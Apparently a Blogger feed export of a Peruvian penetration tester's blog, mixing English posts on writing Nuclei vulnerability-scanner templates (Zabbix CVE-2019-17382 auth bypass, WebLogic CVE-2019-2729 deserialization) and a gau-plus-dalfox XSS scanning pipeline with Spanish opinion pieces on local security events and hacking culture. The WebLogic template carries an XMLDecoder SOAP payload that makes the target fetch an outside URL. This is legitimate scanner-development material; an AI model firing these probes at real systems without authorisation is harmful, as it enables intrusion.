tag:blogger.com,1999:blog-86205882024-03-14T03:31:36.631-05:00Walter Cuestas Agramonte, aka, El EnanoLos mejores HIJOS del mundo viven en mi casa.WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.comBlogger51125tag:blogger.com,1999:blog-8620588.post-91099227457942660952021-05-05T04:15:00.000-05:002021-05-05T04:15:52.226-05:00A little small tiny contribution to Nuclei templates<p><span style="font-family: Rubik;"> Doing traditional pentest is still fun (the real one, not the one like "You have a vulnerable version of XYZ software and sorry, no evidence of exploitation nor PoC).</span></p><p><span style="font-family: Rubik;">One of the latest I got took me to make a small contribution to Nuclei Templates, yes, pure YAML.</span></p><p><span style="font-family: Rubik;">A teammate noticed that Zabbix installation in one target was vulnerable to authentication bypass. A well known vulnerability and I wanted to know if there was a template from Nuclei and yes, there was one. However, Nuclei + this template couldn't find the vulnerability.</span></p><p><span style="background-color: white; color: var(--color-text-primary);"><span style="font-family: Rubik;"><b>CVE-2019-17382.yaml </b>template had a request like this :</span></span></p><div><span class="final-path" style="box-sizing: border-box; color: var(--color-text-primary); font-weight: 600;"><span style="background-color: rgba(6, 6, 7, 0.02); color: #2e3338; font-weight: 500; white-space: break-spaces;"><span style="font-family: Rubik;">requests:
- method: GET
path:
- '{{BaseURL}}/zabbix.php?action=dashboard.view&dashboardid=1'
</span></span></span></div><div><span class="final-path" style="box-sizing: border-box; color: var(--color-text-primary); font-weight: 600;"><span style="background-color: rgba(6, 6, 7, 0.02); color: #2e3338; font-weight: 500; white-space: break-spaces;"><span style="font-family: Rubik;"><br /></span></span></span></div><div><span class="final-path" style="box-sizing: border-box; color: var(--color-text-primary); font-weight: 600;"><span style="background-color: rgba(6, 6, 7, 0.02); color: #2e3338; font-weight: 500; white-space: break-spaces;"><span style="font-family: Rubik;">Problem is that Dashboards can be deleted and the id will change, I mean, in several installations there is no dashboardid=1, but, maybe equal to 2 or 12 or whatever.</span></span></span></div><div><span class="final-path" style="box-sizing: border-box; color: var(--color-text-primary); font-weight: 600;"><span style="background-color: rgba(6, 6, 7, 0.02); color: #2e3338; font-weight: 500; white-space: break-spaces;"><span style="font-family: Rubik;"><br /></span></span></span></div><div><span class="final-path" style="box-sizing: border-box; color: var(--color-text-primary); font-weight: 600;"><span style="background-color: rgba(6, 6, 7, 0.02); color: #2e3338; font-weight: 500; white-space: break-spaces;"><span style="font-family: Rubik;">So, the new version of the request makes use of a payload (in this case a file with a list of possible IDs) and changes to a raw request :</span></span></span></div><div><span class="final-path" style="box-sizing: border-box; color: var(--color-text-primary); font-weight: 600;"><span style="background-color: rgba(6, 6, 7, 0.02); color: #2e3338; font-weight: 500; white-space: break-spaces;"><span style="font-family: Rubik;"><br /></span></span></span></div><div><div><span style="color: #24292e; font-family: Rubik;"><span style="background-color: white; white-space: pre;">requests:</span></span></div><div><span style="color: #24292e; font-family: Rubik;"><span style="background-color: white; white-space: pre;"><br /></span></span></div><div><span style="color: #24292e; font-family: Rubik;"><span style="background-color: white; white-space: pre;"> - payloads:</span></span></div><div><span style="color: #24292e; font-family: Rubik;"><span style="background-color: white; white-space: pre;"> <b>ids</b>: helpers/wordlists/numbers.txt</span></span></div><div><span style="color: #24292e; font-family: Rubik;"><span style="background-color: white; white-space: pre;"><br /></span></span></div><div><span style="color: #24292e; font-family: Rubik;"><span style="background-color: white; white-space: pre;"> attack: sniper</span></span></div><div><span style="color: #24292e; font-family: Rubik;"><span style="background-color: white; white-space: pre;"> threads: 50</span></span></div><div><span style="color: #24292e; font-family: Rubik;"><span style="background-color: white; white-space: pre;"><br /></span></span></div><div><span style="color: #24292e; font-family: Rubik;"><span style="background-color: white; white-space: pre;"> raw:</span></span></div><div><span style="color: #24292e; font-family: Rubik;"><span style="background-color: white; white-space: pre;"> - |</span></span></div><div><span style="color: #24292e; font-family: Rubik;"><span style="background-color: white; white-space: pre;"> GET /zabbix.php?action=dashboard.view&dashboardid={{<b>ids</b>}} HTTP/1.1</span></span></div><div><span style="color: #24292e; font-family: Rubik;"><span style="background-color: white; white-space: pre;"> Host: {{Hostname}}</span></span></div><div><span style="color: #24292e; font-family: Rubik;"><span style="background-color: white; white-space: pre;"> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0</span></span></div><div><span style="color: #24292e; font-family: Rubik;"><span style="background-color: white; white-space: pre;"> Accept-Language: en-US,en;q=0.9</span></span></div></div>WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com0tag:blogger.com,1999:blog-8620588.post-21511866347218760002021-03-03T01:34:00.004-05:002021-03-15T20:03:59.523-05:00Web Vulnerability Scanning based on URLs from Wayback Machine, OTX, Common Crawler<p><span style="font-family: Rubik;"> [gau + burp | dalfox] GAU : Get complete URLs from site such as wayback machine, common crawler (kinda shoda for URLs) and Allien Vault incidents db. DALFOX : web vuln scanner, mainly for XSS.</span></p><p><span style="font-family: Rubik;">"getallurls (gau) fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl for any given domain."</span></p><p><span style="font-family: Rubik;">GO111MODULE=on go get -u -v github.com/lc/gau</span></p><p><span style="font-family: Rubik;">gau -b png,jpg,gif example.com > gau.rpt <==a bunch of URLS with arguments (if they exist on those providers)</span></p><p><span style="font-family: Rubik;"><br /></span></p><p><span style="font-family: Rubik;">* Chained with Burp :</span></p><p><span style="font-family: Rubik;">for url in `cat gau.rpt`; do http --verify no --proxy https:https://127.0.0.1:8080 $url; done</span></p><p><span style="font-family: Rubik;"><br /></span></p><p><span style="font-family: Rubik;">Then, active scan over them (they will appear in site map)</span></p><p><span style="font-family: Rubik;"><br /></span></p><p><span style="font-family: Rubik;">* Chained with Dalfox</span></p><p><span style="font-family: Rubik;">GO111MODULE=on go get -v github.com/hahwul/dalfox/v2</span></p><p><span style="font-family: Rubik;"><br /></span></p><p><span style="font-family: Rubik;">cat gau.rpt | dalfox pipe</span></p>WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com0tag:blogger.com,1999:blog-8620588.post-37864143250768674582021-02-15T16:23:00.000-05:002021-02-15T16:23:08.920-05:00Back to post : Nuclei vulnerability scanner<p><span style="font-family: Rubik;">Repo : https://github.com/projectdiscovery/nuclei</span></p><p><span style="font-family: Rubik;">Get the binary or compile the source</span></p><p><span style="font-family: Rubik;">Download templates :</span></p><p><span style="font-family: Rubik;">git clone https://github.com/projectdiscovery/nuclei-templates.git</span></p><p><span style="font-family: Rubik;">Nuclei is based on "signatures" from services based on HTTP/HTTPS (Yara rules based)</span></p><p><span style="font-family: Rubik;">It's easy to add "rules" or templates to search for other vulnerabilities and get another vulnerability scanner : additional, light and it's part of a new kind of scanners that use same techniques (not everyone uses yaml).</span></p><p><span style="font-family: Rubik;">Notice that it targets low hanging fruits.</span></p><p><span style="font-family: Rubik;">Adding a template f</span><span style="font-family: Rubik;">or weblogic :</span></p><p><span style="font-family: Rubik;">1. Analized how previous similar vuln was detected (send a xml by GET)</span></p><p><span style="font-family: Rubik;">2. Create a template such as this one :</span></p><p><span style="font-family: Rubik;">cat nuclei-templates/weblogic.yaml </span></p><p><span style="font-family: Rubik;">id: CVE-2019-2729</span></p><p><span style="font-family: Rubik;"><br /></span></p><p><span style="font-family: Rubik;">info:</span></p><p><span style="font-family: Rubik;"> name: WebLogic Deserialization</span></p><p><span style="font-family: Rubik;"> author: wcu35745</span></p><p><span style="font-family: Rubik;"> severity: high</span></p><p><span style="font-family: Rubik;"> #reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2729</span></p><p><span style="font-family: Rubik;"> </span></p><p><span style="font-family: Rubik;">requests:</span></p><p><span style="font-family: Rubik;"> - method: GET</span></p><p><span style="font-family: Rubik;"> path:</span></p><p><span style="font-family: Rubik;"> - "{{BaseURL}}/wls-wsat/CoordinatorPortType"</span></p><p><span style="font-family: Rubik;"> headers:</span></p><p><span style="font-family: Rubik;"> Content-Type: text/xml</span></p><p><span style="font-family: Rubik;"> SOAPAction: <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8" class="java.beans.XMLDecoder"><void id="url" class="java.net.URL"><string>http://%s:%d/cve-2017-10271?target=%s%s</string></void><void idref="url"><void id="stream" method = "openStream" /></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope></span></p><p><span style="font-family: Rubik;"> matchers:</span></p><p><span style="font-family: Rubik;"> - type: status</span></p><p><span style="font-family: Rubik;"> status:</span></p><p><span style="font-family: Rubik;"> - 200</span></p><p><span style="font-family: Rubik;"> - type: word</span></p><p><span style="font-family: Rubik;"> <b>words</b>:</span></p><p><span style="font-family: Rubik;"> - "weblogic.wsee.wstx.wsat.v10.endpoint.CoordinatorPortTypePortImpl"</span></p><p><span style="font-family: Rubik;"> part: body</span></p><p><span style="font-family: Rubik;">3. <b>Words</b> come from the response to the request with the xml SOAP envelope.</span></p><p><span style="font-family: Rubik;">4. Put the URLs to scan in a text file (http or https://dns_name_or_IP) or use the -t parameter for single target</span></p><p><span style="font-family: Rubik;">5. If found vulnerable, an output such as this one will appear :</span></p><p><span style="font-family: Rubik;">./nuclei -l targets.txt -t nuclei-templates/weblogic.yaml -v -timeout 20 -retries 3</span></p><p><span style="font-family: Rubik;"><br /></span></p><p><span style="font-family: Rubik;"> __ _ </span></p><p><span style="font-family: Rubik;"> ____ __ _______/ /__ (_)</span></p><p><span style="font-family: Rubik;"> / __ \/ / / / ___/ / _ \/ / </span></p><p><span style="font-family: Rubik;"> / / / / /_/ / /__/ / __/ / </span></p><p><span style="font-family: Rubik;"> /_/ /_/\__,_/\___/_/\___/_/ v1<span style="white-space: pre;"> </span> </span></p><p><span style="font-family: Rubik;"><br /></span></p><p><span style="font-family: Rubik;"><span style="white-space: pre;"> </span>projectdiscovery.io</span></p><p><span style="font-family: Rubik;"><br /></span></p><p><span style="font-family: Rubik;">[WRN] Use with caution. You are responsible for your actions</span></p><p><span style="font-family: Rubik;">[WRN] Developers assume no liability and are not responsible for any misuse or damage.</span></p><p><span style="font-family: Rubik;">[INF] [CVE-2019-2729] Loaded template WebLogic Deserialization (@wcu35745) [high]</span></p><p><span style="font-family: Rubik;">[CVE-2019-2729] https://ip_address/wls-wsat/CoordinatorPortType </span></p><p><span style="font-family: Rubik;"><b>There is no other indication, only the absence of the previous [status] </b></span></p>WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com0tag:blogger.com,1999:blog-8620588.post-34317666458967389782014-06-16T02:38:00.000-05:002014-06-16T02:38:22.635-05:00Otra vez...si, again...sobre Eventos y "eventos" de Seguridad y "seguridad"Como 140 caracteres no son suficientes, me toco volver al querido blog para defogar de manera adecuada mis impetus por ponerle claro a varios que no todos somos idiotas, que habemos peruanos con el suficiente nivel intelectual como para no dejar que nos metan el dedo y prevenir a otros que no se lo dejen meter.<br />
<br />
El proximo miercoles se llevara a cabo un "evento" de "seguridad" que resulta, cuando menos, asombroso.<br />
Se supone que es un evento "academico" y ya tuve el "placer" de asistir el año pasado, salvo dos presentaciones (Erick Iriarte y Juan Davila), las demas fueron un bodrio total. Desde el español con infulas de presentador de TV hasta el greengo vendedor de cebo de culebra. Hubo uno mas que al menos reconocio que fue a vender sus productos, asi lo dijo y asi trato de hacerlo, valga su honestidad.<br />
Este año les pido que vayan. Si, aunque parezca contradictorio, vayan. Duden de lo que escribo y vayan para que, luego, puedan comentar si aprendieron algo en alguna de las "charlas"...PERO...descontemos de esas "charlas" a las exposiciones de Erick Iriarte y Claudio Caracciolo porque esas seran las unicas dos que valdran la pena.<br />
Entonces, si hay algo bueno, aunque sea 2 de 10 speakers, por que criticarlo ? Por todo lo demas!<br />
<b>Organizadores :</b> Alguien conoce a Pukaratech ? Yo tampoco, pero, revisando un poco, veo que es una empresa que se constituyo despues que se hizo el anuncio del evento (donde ya aparecia como organizadora) y que tiene un representante legal cuyo segundo apellido coincide con el segundo apellido del organizador. Este mundo esta lleno de coincidencias!<br />
<b>Sponsors </b>: Que cuentan con una empresa de dudosa reputacion que siempre es bienvenida porque se pone con un buen billete como sponsor. Claro, en los eventos donde son muy inocentes o prefieron no enterarse.<br />
<b>Nombre del Evento :</b> Es bien curioso que lo califican como un evento academico en su web y en varios lados donde se han movido, inclusive en la prensa especializada, PERO, en su pagina de Facebook dice que es una empresa! Entonces, evento o empresa o ambos ? Esta moda de la "union civil"...<br />
<b>Lugar, patrocinador, auspiciador o que ? :</b> El evento se hace en una de las instalaciones del Ejercito Peruano. A ver si me explican como lo hacen. Les pagan por usar el auditorio y areas conexas y por el control que debe ejercer el personal al ingreso, movimiento y salida de los participantes ? Por el consumo de luz, agua, etc. ?<br />
El organizador es un miembro activo del Ejercito Peruano, hablaran un par de Generales, aparecen logos de unidades del Ejercito Peruano y todo ello para un evento comercial, si, COMERCIAL, NO academico!<br />
Y si tengo el derecho a exigir que me expliquen todo eso porque aunque sea un milesimo de los impuestos que pago puntualmente a SUNAT van a parar al mantenimiento de esa instalacion, a pagar el pauperrimo sueldo de los soldados que custodian el lugar.<br />
<b>Costo :</b> Si, el evento "academico" de "seguridad" "no tiene costo", PERO, si quieres un "certificado", debes pagar US$18. Eso ya es COMERCIAL.<br />
A ver, asumo que vendra con base de madera y vidrio encima, como los de GIAC, minimo! Es que US$18 o casi S/.50 por un certificado, minimo lo mandan a imprimir a US y de ahi lo envian para aca.<br />
Solo para referencia : un certificado de Brainbench impreso en buenisima calidad y que viene desde US cuesta US$14,95.<br />
Pero, mas importante que el precio es saber a donde ira a parar el dinero de los pobres tontos que paguen por ese certificado ?!<br />
O peor aun, cuan absurdo es ostentar un certificado de haberse pasado el dia escuchando 8 charlas comerciales o tan basicas que los niños de pre-escolar se aburririan como todos los soldados que se quedaban dormidos en el evento del año pasado ?! (Sigo exceptuando las de Erick y Claudio). Premio a que ?! A dormir sin roncar ?<br />
<br />
Este tema de los "eventos" de "seguridad" ya es cansado en Perú. Mientras que en otros paises proliferan eventos serios y buenos de seguridad, aca siguen surgiendo y promocionandose "eventos" como el que critico.<br />
Ya otro "eventero" que cobraba por certificados tuvo que mudarse fuera de Lima y hasta fuera de Perú, pero, como vio que se le acabo el publico, ya paro.<br />
<br />
Se que alguno pensara "claro, como este tio organizo su "*Hack" y ahora organiza su "*HACK", le jode que otros lo hagan..." o "como el no participa como speaker, le jode...".<br />
Como siempre digo, me importa muy poco lo que piensen de mi los que no me conocen.<br />
Los *HaCk son 100% gratuitos y 100% seguridad a la vena. Nadie puede discutir eso, asi como nadie puede discutir que se necesitan otro tipo de eventos de defensa y gestion en seguridad de la informacion y seguridad informatica.<br />
<br />
Pero, hay eventos en los que no tengo vela como los de ISACA y me parecen super buenos, mas los mensuales que el evento principal.<br />
ISSA organiza eventos de seguridad enfocados en sectores diferentes.<br />
Ambos tienen sus toques comerciales, pero, detras de ellos hay gente vigilando que los participantes no reciban un "callejon oscuro" de vendedores de cebo de culebra.<br />
OWASP Perú, cuantos de los que lean este post han ido a sus eventos? Este año han arrancado haciendo eventos mensuales, eventos especiales y seguiran con mas cosas.<br />
Y hasta los eventos de seguridad que son netamente comerciales y se anuncian como tal, pueden valer la pena porque no se presentan con hipocresia : te vendo mi cebo de culebra, me lo compras ?<br />
<br />
Y si se pueden hacer eventos 100% gratuitos. Se tienen que trabajar mucho por conseguir sponsors y hasta poner dinero de su propio bolsillo, pero, asi es cuando se quieren hacer eventos que realmente aporten y no que sean un negocio. <br />
Por ello, seria mas honesto presentar el evento como "evento comercial de seguridad" y presentarse como "organizador de eventos" y no como "profesional de seguridad".<br />
BTW, critique el evento hace tiempo en Linkedin, el organizador me mando un mail por ese medio haciendome "el pare" y fiel al estilo del gordo Phillip Butters, le di todos mis datos para que me busque, me llame o lo que sea y decirle todo en su cara. Sigo esperando.<br />
<br />
Entonces, los que lean esto y vivan en Lima y no sean futboleros (existira alguien asi?), vayan al "evento" y despues comentan publicamente, asi me equivoque esta vez (ojala!).<br />
Claro, mi sincera recomendacion es que vayan a escuchar a Claudio y Erick (terminan a la 1pm) y de ahi fugen a ver el España vs Chile que debera estar buenisimo!<br />
<br />WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com0tag:blogger.com,1999:blog-8620588.post-55149789519506603272013-12-27T22:00:00.001-05:002013-12-28T19:47:02.403-05:00Memorias del 2013 y algo más...<span style="font-family: Arial, Helvetica, sans-serif;">Me resisti, pero, aca estoy otra vez posteando, claro, algo que la "Ley de Delitos Informaticos" no impida.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">No puedo dejar de referenciar unos comentarios que lei hace unos dias sobre un video de una entrevista que nos hicieron a Cesar Cuadra y a mi durante el segundo LimaHack. Diablos ! Que ira en esos comentarios !</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Entre chilenos ( o pseudo chilenos ) que nos odian (a los peruanos) y peruanos que nos odian por ser peruanos ! (estos ultimos son los peores).</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Igual, hasta las idioteces y forma de escribir (pésima ortografía y peor redacción) me hicieron reflexionar sobre varias cosas que paso a comentar.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">La gente lee y escucha lo que le da la gana. Ojo, esto es bien diferente de la interpretación que alguien pueda hacer respecto a una exposición de ideas y lo es porque al hablar de hacking todo es bien absoluto, discreto, si o no, 1 ó 0, por suerte! Así que si uno dice algo, es una verdad o una mentira.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Recibir un PDF que se llama "infoAES256" y decir que no hay data relevante y que es altamente probable que sea parte de un CSA es un hecho, pero, cuantos saben realmente que es un CSA ? Y eso que existen hace muchos años...</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Eso me lleva al problema básico que tenemos en nuestro país : hay gente que sabe de hacking, pero, no son muchos.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Incluso, no puedo dejar de referenciar a un tuit reciente de </span><a class="twitter-atreply pretty-link" dir="ltr" href="https://twitter.com/LulzSecPeru" style="background-color: whitesmoke; color: #038543; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 14px; line-height: 18px; text-decoration: none; white-space: pre-wrap;"><s style="color: #67b58e; text-decoration: none;">@</s><b style="font-weight: normal; text-decoration: underline;">LulzSecPeru</b></a> (<a href="http://pastebin.com/raw.php?i=HdM5SPzc">http://pastebin.com/raw.php?i=HdM5SPzc</a>) <span style="font-family: Arial, Helvetica, sans-serif;">donde describen como hicieron una penetración a la red y servicios de un ministerio para "leakear" cierta información. Cuantas personas son ? Dos unicamente ? Cuatro (2 colaboradores más) ? El hecho es que existen y tienen los conocimientos suficientes para hacer lo que hicieron, pero, insisto : no son muchos.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Para mí, esto ocurre por varias taras :</span><br />
<br />
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">El "perfil bajo" que es el escudo a la mediocridad. Esta vulgar excusa hace que la gente no hable ni escriba porque no son "figurettis" o porque los "tecnicos no hablan mucho". Falacia! Si alguien habla o escribe para decirle a los demás que es el mejor hacker del mundo, si es figuretti, pero, sí lo hace para compartir los resultados de su aprendizaje o investigación, lo que esta haciendo es CRECER como persona y profesional y ayudar a CRECER a los demás. Por ello, el "perfil bajo" solamente es un escudo para aquellos que quieren crear un alito de misterio a su alrededor y solamente saben que nada saben.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Hay gente que cree que sabe porque aprendió a usar algunas herramientas de software o porque "hackea" cuentas de personas en redes sociales. Y en esto caigo en el mismo problema de los taxis parando en cualquier parte o de los micros llenos de gente : no es solamente problema de los conductores, es problema de los pasajeros también ! Sí existen "hackers" como en la calle Wilson, es porque existen clientes que piden sus "servicios" y se genera un "mundo de hackers" que realmente no lo es. Sí existen "hackers eticos" o "pentesters" que hacen evaluaciones mediocres es porque existen clientes que saben poco o nada respecto al tema y, lo que es peor, no les interesa saber más ! Es por ello que los de </span><a class="twitter-atreply pretty-link" dir="ltr" href="https://twitter.com/LulzSecPeru" style="background-color: whitesmoke; color: #038543; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 14px; line-height: 18px; text-decoration: none; white-space: pre-wrap;"><s style="background-color: whitesmoke; color: #67b58e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 14px; line-height: 18px; text-decoration: none; white-space: pre-wrap;">@</s><b style="background-color: whitesmoke; color: #038543; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 14px; font-weight: normal; line-height: 18px; text-decoration: underline; white-space: pre-wrap;">LulzSecPeru</b></a> <span style="font-family: Arial, Helvetica, sans-serif;">adicionaron "No basta saber Ethical Hacking" porque esta muy venido a menos!</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Aún existen peruanos que no soportan que hayan otros peruanos que les vaya bien. Acaso ven a los argentinos o colombianos o ecuatorianos o chilenos "metiendose cabe" entre ellos con el amplio ratio que lo hacen muchos peruanos ? Aca existe un fulano que se dedica vender "cebo de culebra" a los desconocedores. Vive de hacer eventos de forensia y hacking en Lima y ahora en provincias y la mayoría son "gratuítos" y cobra por emitir "certificados", de eso vive y se autodenomina "experto". Siempre en sus "charlas" raja de otros peruanos para posicionarse, ninguno le parece bien e incluso por ahi dijo que se han ido a "importar" hackers a otro país para sus eventos porque acá no hay...Insisto: es lo mismo que los taxis y micros : quien puede querer un certificado por ir a un evento de puras charlas ? Que nivel de conocimiento puede garantizar con haberse sentado a escuchar parlotear y mostrar fotos a unos individuos ? BTW : por eso ni LimaHack ni PERUHACK dan certificados, son GRATUITOS al 100% y no pretenden ser "cursos de hacking" ni similares, solo despertar conciencia y difundir conocimiento.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Los medios de comunicación hacen un aporte absurdo o no aportan al tema. Con este asunto de la "Ley de Delitos Informáticos", cuántos hackers peruanos fueron invitados a dar opinion respecto al tema ? Solamente invitaron a abogados y de todos, solo uno mantiene relación con hackers (Erick Iriarte </span><a class="twitter-atreply pretty-link" href="https://twitter.com/coyotegris" style="background-color: white; color: #0084b4; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px; text-decoration: none !important;"><s style="color: #66b5d2; text-decoration: none;">@</s>coyotegris</a> <span style="font-family: Arial, Helvetica, sans-serif;">). Si, ya se, alguien saldrá a decir "un hacker no se presenta en TV...", "un hacker no se autodenomina", etc (laaaargo etc.) Ya deberíamos dejarnos de tanta retórica ya que por andar debatiendo el uso de términos perdemos mucho tiempo y eso no le aporta nada a lo que nos interesa : el hacking. Un delincuente informático no se presentaría ni por TV, radio o prensa escrita, pero, un hacker si. Antes de escribir este post vi un reportaje de un canal de TV sobre una noticia basada en el reporte de un fabricante de antivirus que indica que en Perú esta la mayor cantidad de hackers de Latino América. Lo primero que me surge como pregunta es : no se dan cuenta que Perú (más rápido o más lento) es el país con mayor crecimiento económico en la región y eso nos hace CLIENTES deseados ?! Osea, que mejor forma de venderle a los peruanos que metiéndoles miedo ? Porque la afirmación de ese fabricante no va por el lado de "bien peruanos! son unos genios!" si no por el lado de "peruanos cuidado! viven en la inseguridad total! nosotros podemos cuidarlos!" Y, luego, el reportaje mete a la gente de DIVINDAT (ya lo se, no les daré más, pero, si debo decir que no estan preparados para este mundo de inseguridad y por ello su opinión casi siempre va a /dev/null) y se ponen a hablar de carders como si no vieran que la mayoria no son peruanos.</span></li>
</ul>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">El título del post hace referencia a "memorias del 2013" y todo lo anterior parece ser una constante a través del tiempo y si, lo es, y, por ello, también, lo fue en el 2013. Hay más, pero, como no quiero quedarme criticando unicamente, aca van mis ideas respecto a lo que se debe hacer para terminar con esas taras :</span></div>
<div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Dejemos el "perfil bajo" en el /dev/null. Cómo ? Cuando vayamos a un evento o una clase, preguntemos a discresión, "sangremos" al expositor o profesor, obliguemoslo a que piense y que si no tiene la respuesta al momento, investigue y difunda la respuesta. No tengamos vergüenza de preguntar. Objetemos : sí tenemos otra posición, postura o el expositor/profesor dice una estupidez o comete un error, hay que decirselo, dejemos de querer ser "nice" todo el tiempo. Comuniquemonos : usen el Twitter para compartir sus conocimientos, blogueen, organicen reuniones presenciales para conversar sobre hacking, exijan y participen en eventos de hacking, no tengan temor de exponer sus conocimientos porque, mucho o poco, simple o sofisticado, siempre hay alguien que no lo sabe y le servirá.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Sí para mejorar el sueldo y el puesto me piden una maestría y no es requisito saber de hacking y de inseguridad, perfecto, a estudiar la maestría, PERO, a leer e investigar mucho de hacking. No se puede pretender que todos sean hackers, pero, por qué funcionan los ataques a las redes y servicios "protegidos" aún hoy en día ? Porque quienes administran la seguridad solo saben hacer eso : administrar, gestionar y confian en los vendedores de productos y servicios de seguridad porque se supStop pone que tienen "expertos". Y si, es cierto, tienen "expertos" en configurar software y gestionar seguridad, pero, no en IN-seguridad o seguridad ofensiva (término muy usado este año, suena bien, créditos a Offensive Security).</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">No tengamos temor en denunciar cuando vemos que un proveedor de seguridad hace mal su trabajo o cuando un "ethical hacker" hace un trabajo miserable y mediocre o cuando una "empresa de prestigio internacional" presente documentos adulterados o cuando un "hacker ético" dicta cursos "oficiales" con material pirateado (contratado por dicha empresa). Pero, no solo hablemos de lo negativo : este año he visto como Alonso Caballero (<a class="twitter-atreply pretty-link" href="https://twitter.com/Alonso_ReYDeS" style="background-color: white; color: #038543; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px; text-decoration: none !important;"><s style="color: #67b58e; text-decoration: none;">@</s>Alonso_ReYDeS</a>) ha hecho un excelente trabajo como profesional del hacking ético a través del entrenamiento por diferentes medios y con una excelente calidad. No menciono a alguien de Open-Sec porque podrán decir que es cherry para lo mio, pido disculpas a la gente de nuestro equipo por no hacerlo. Felipe Gonzalez es otro profesional que aporta mucho desde el 2009 (que es el año en que lo conocí) (<a class="twitter-atreply pretty-link" href="https://twitter.com/mygeekside" style="background-color: white; color: #0084b4; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px; text-decoration: none !important;"><s style="color: #66b5d2; text-decoration: none;">@</s>mygeekside</a>). Cómo no mencionar a Juan Oliva (<a class="twitter-atreply pretty-link" href="https://twitter.com/jroliva" style="background-color: white; color: #2fc2ef; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px; text-decoration: none;"><s style="color: #82daf5; text-decoration: none;">@</s>jroliva</a>) que este año anduvo por varios países de Sud América y Europa difundiendo conocimiento y entrenando a un monton de personas en seguridad y hacking de VoIP.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Cualquier momento y cualquier foro es bueno para emitir opinión. Sí los medios de prensa no dan cabida al tema es porque aún dejamos que nos vean como primitivos. Este año acudí a un evento de ciberseguridad y ciberdefensa en una entidad militar. Es increíble como pueden venir personas extranjeras y peruanas a hablar tanta cosa básica y comercial como sí fuesemos "primariosos". Charlas llenas de mensajes de ventas, de "mete-miedo", de figurettis, etc. y una audiencia aburrida, pero, callada "para no hacer roche". Hay que hablar, no digo pararse a reclamar, pero, si a preguntar cosas reales, a objetar y a usar ese foro como debe ser. En ese evento se habló de la Ley de Delitos Informáticos y casi nadie pregunto o dió una opinión y tenían a un experto en la materia al frente ! Menos mal que una charla similar en PERUHACK 2013 fue materia de preguntas y debate amplio en la misma sala.</span></li>
</ul>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Viendo las cosas de otra perspectiva, este año trajo muchas cosas buenas y malas, como siempre, no ? :</span></div>
</div>
<div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Ya no se si creer en las certificaciones o no, lo confieso. Son tantos los que no las tienen que lejos de ser apreciadas, terminan siendo menospreciadas. Saque el OSCP solo por demostrarme que podía someterme a ese reto que todos dicen es super dificil y lo hice solo (no en grupo como varios que conozco). Luego, vino el C(PTC, pero, eso fue por un obsequio de la gente de Mile2. Además, he visto gente que tiene certificaciones que consiguió por saber estudiar bien y no porque sepan de hacking. Aún mantengo mi postura : si sabes de hacking, saca al menos una certificación para que demuestres y te demuestres el nivel de conocimiento que tienes ya que te mide en varios aspectos.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Relacionado a lo anterior esta el hecho que no sabría como recomendar a alguien que certificación obtener porque la oferta de entrenamiento es cercana al 0x00 y la dichosa Ley de Delitos Informáticos puede permitir que un juez interprete que el impartir conocimientos sobre como explotar vulnerabilidades sea un delito toda vez que demostrar que no existió dolo deberá pasar por un proceso judicial para sentar jurisprudencia (que otros inviertan en abogados, yo no y menos con un sistema de justicia tan ineficiente y corrupto como el peruano).</span></li>
